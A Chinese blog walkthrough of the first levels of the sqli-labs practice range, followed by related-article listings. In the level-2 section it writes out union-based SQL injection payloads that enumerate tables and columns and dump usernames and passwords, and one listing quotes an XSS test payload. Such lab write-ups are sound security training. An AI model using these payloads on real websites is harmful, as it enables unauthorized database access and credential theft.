sql-labs靶场通关全攻略

已于 2024-07-22 20:14:56 修改
阅读量355 收藏 5
点赞数 10
文章标签: sql 数据库
于 2024-07-22 20:02:58 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_63944205/article/details/140617568
版权

第一关

1.判断是字符型还是数字型

加单引号看看

报错,我们看到报错,添加--+正常显示判断是字符型报错

2.判断列数

3不报错

4报错,证明是有3列

3.判断回显点

发现2,3为回显点

4.查询数据库

5.查询当前数据库中的表

6.查询当前users表中的列

7.查询users表中的内容

每个字段中间加个~可以让数据分开好看.

第二关

1.同样我们还判断注入类型

?id=1 and 1=1

?id=1 and 1=2

可见是数字型注入

2.判断列数

order by 3

order by 4

同样的还是只有三列

3.判断回显

?id=-1 union select 1,2,3

回显同样为2,3

4.查看数据库

?id=-1 union select 1,2,database()

5.查询当前数据库中的表

?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'

6.查看users表中的列

?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'

7.查看users表中的数据

?id=-1 union select 1,2,group_concat(id,'~',username,'~',password) from users

第三关

1.判断注入类型

这里输入单引号括号实现闭合,故此是字符型

2.判断列数

所以这里有三列

3.判断回显点

2,3为回显带点

4.查询数据库

5.查看当前数据库下的表

6.查看users表中的列

7.查看users表中的数据

第四关

等后续加载

丢了没
关注
  • 10
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
sqli-labs靶场练习笔记
11-09
sqli-labs靶场练习笔记,里面有2关 3关 4关 5关 4关 7关 8关 9关 11关 12关 13关 14关 15关 16关 17关 18关 19关 20关 21关 22关 23关 24关 的练习内容,可以供给初学sql注入的学者参考
SQL-Labs靶场“46-50”关通关教程
钟言的博客
02-24 1万+
本篇为SQL-Labs靶场的第46关到50关教程,详细内容包含了:四十六关 ORDER BY数字型注入 1、源码分析 2、rand()盲注 3、if语句盲注 4、时间盲注 5、报错注入 6、Limit注入 四十七关 ORDER BY单引号报错注入 1、源码分析 2、报错注入 3、时间盲注 三、四十八关 ODRER BY数字型盲注 1、源码分析 2、rand()盲注 3、if语句盲注 4、时间盲注 四、四十九关 ORDER BY单引号盲注1、源码分析 2、时间盲注 五、五十关 ORDER BY数字型堆叠注等
SQL-Labs靶场“36-37”关通关教程
钟言的博客
03-19 3409
本篇为SQL-Labs靶场的36关到37关的通关教程,详细内容包含了:一、36关 GET单引号宽字节注入1、源码分析2、联合查询注入3、updatexml报错注入4、floor报错注入37关POST单引号宽字节注入1、源码分析2、联合查询注入3、updatexml报错注入4、floor报错注入等内容
SQL-Labs靶场“32-33”关通关教程
钟言的博客
03-14 5674
本篇为SQL-Labs靶场的第32关到33关的通关教程(宽字节注入),详细内容包含了、32关 GET单引号闭合宽字节注入 1、源码分析 2、宽字节注入原理 3、联合查询 4、updatexml报错注入 5、floor报错注入 、33关 GET单引号addslashes逃逸注入 1、源码分析 2、联合查询 3、updatexml报错注入 4、floor报错注入等内容
sqli-labs靶场通关(1-10)
Fly_Mojito的博客
06-11 3601
sqli-labs靶场通关(1-10)
SQL-Labs靶场“34-35”关通关教程
钟言的博客
03-18 2525
本篇为SQL-Labs靶场的34到35关教程,详细内容包含了:34关 POST单引号宽字节注入 1、源码分析 2、联合查询注入 3、updatexml报错注入 4、floor报错注入 35关 GET数字型报错注入 1、源码分析 2、联合查询注入 3、updatexml报错注入 4、floor报错注入等内容
sql-labs靶场
K_kiii的博客
01-26 415
将压缩包放置根目录下,找到sqil-connections并打开db-creds.inc。
SQL注入从入门到进阶:sqli-labs靶场通关笔记
tzyyyyyy的博客
09-26 5488
SQL注入从入门到进阶:sqli-labs全关通关笔记 Less-1~Less64
SQL-Labs靶场“21-25”关通关教程
热门推荐
钟言的博客
02-20 1万+
本篇为SQL-Labs靶场的21关到25关通关教程,详细内容包含了、二十一关 基于base64编码单引号Cookie注入 1、源码分析 2、联合查询注入 3、updatexml报错注入 、二十二关 基于base64编码双引号Cookie注入 1、源码分析 2、联合查询注入 3、updatexml报错注入 二十三关 基于GET过滤注释 1、源码分析 2、updatexml报错注入 3、联合查询注入 四、二+四关 基于POST存储型二次注入 1、源码分析 2、二次注入 五、二十五关 基于GET单引号OR、A等等
WEB渗透学习-upload-labs靶场
04-20
**WEB渗透学习-upload-labs靶场详解** 在网络安全领域,特别是Web渗透测试中,了解和掌握文件上传漏洞是至关重要的技能。"upload-labs"靶场是一个专为学习和实践文件上传漏洞设计的平台,它提供了21个关卡,从基础...
xss-labs靶场通关
10-13
xss-labs靶场通关 本篇文章将对xss-labs靶场的六关源码进行详细的分析和总结,并对每一关的xss攻击payload进行解释。 第一关 xss-labs靶场的第一关源码没有做任何过滤,直接上xss payload:<script>alert("XSS")...
upload-labs靶场通关指南
07-02
Upload-labs靶场通关指南 Upload-labs靶场是一款文件上传漏洞靶场,旨在帮助安全研究员和渗透测试人员练习文件上传漏洞的检测和利用。本指南提供了 Upload-labs靶场通关指南,涵盖了从基础的文件上传漏洞到高级...
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
SQL注入:sqli-labs靶场通关(1-37关)
qq_68163788的博客
02-03 5683
sqli-labs是一个用于学习和练习SQL注入的开源项目。它提供了一系列的实验室环境,让用户能够在不同的SQL注入场景中进行练习和测试。这些场景包括基本的SQL注入、盲注、联合查询注入等等。 sqli-labs还提供了详细的说明和解释,帮助用户理解SQL注入的原理和技术。通过这些实验和学习,用户可以更好地了解SQL注入的危害,并学会如何防范和阻止SQL注入攻击
PostgreSQL异常:An I/O error occurred while sending to the backend
IT后浪的博客
07-19 384
在使用PostgreSQL数据库批量写入数据的时候,遇到了一个问题,异常内容如下:Cause: org.postgresql.util.PSQLException: An I/O error occurred while sending to the backend.
PostgreSQL的逻辑架构
weixin_41992498的博客
07-18 133
一、PostgreSql的逻辑架构:所有者:
【MySQL】根据binlog日志获取回滚sql的一个开发思路
最新发布
weixin_45385457的博客
07-19 454
不同客户端之间会交替追加在 binlog 中,需要通过 👆的 binlog 匹配流程来控制匹配。行,需要再次寻找 thread_id 相同的行,匹配到后执行上一个流程。在 binlog 中的线程 ID 记录为 thread_id。一个线程执行多个 sql 回滚到同一个文件可能带来的问题。对应 binlog 日志中的 thread_id=指定 mysql 客户端 开始时间和结束时间。打开 mysql 客户端 开始时间。关闭 mysql 客户端 结束时间。先匹配 thread_id 相同的。
SQL Server详细使用教程(包含启动SQL server服务、建立数据库、建表的详细操作) 非常适合初学者
hackeroink的博客
07-15 1339
本文主要详细介绍SQL server2019的简单使用,以《数据库系统概论(第5版)》的第79页—第80页为例,详细介绍如何使用SQL server2019这款数据库软件,包括启动SQL server服务,建立数据库(学生—课程模式S-T),建立课程表等,内容比较简单,容易理解,适合广大初学者了解SQL server的简单使用。不会涉及到复杂的语法知识,如果有也会详细解释的!下文标红的字请重点关注一下!本文的需要建表的数据如下:2.Course课程号Cno课程名Cname先行课Cpno学分。
upload-labs靶场通关
09-14
要通过upload-labs靶场,你需要完成以下几个步骤: 1. 首先,你需要上传一个文件到服务器。通过使用move_uploaded_file函数,将临时存储路径的文件移动到指定的上传目录。具体代码可以参考引用中的示例。 2. 上传目录的路径可以根据需求进行设置,通常是在代码中定义一个常量来表示上传目录的路径。例如,将上传文件保存在../upload/目录下,可以使用引用中的路径作为上传目录。 3. 为了确保上传的文件具有唯一的文件名,你可以使用一些方法来生成一个唯一的文件名,例如使用时间戳、随机字符串等。然后,将上传的路径和文件名进行拼接,形成最终的上传文件路径。具体代码可以参考引用中的示例。 4. 当文件上传成功后,你可以根据靶场的要求,继续完成后续的操作,例如在上传的文件中发现漏洞或者进行文件包含等攻击。 总结起来,完成upload-labs靶场通关,你需要使用move_uploaded_file函数将临时存储路径的文件移动到指定的上传目录,设置上传目录的路径,并确保上传的文件具有唯一的文件名。这样就能顺利通过upload-labs靶场了。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值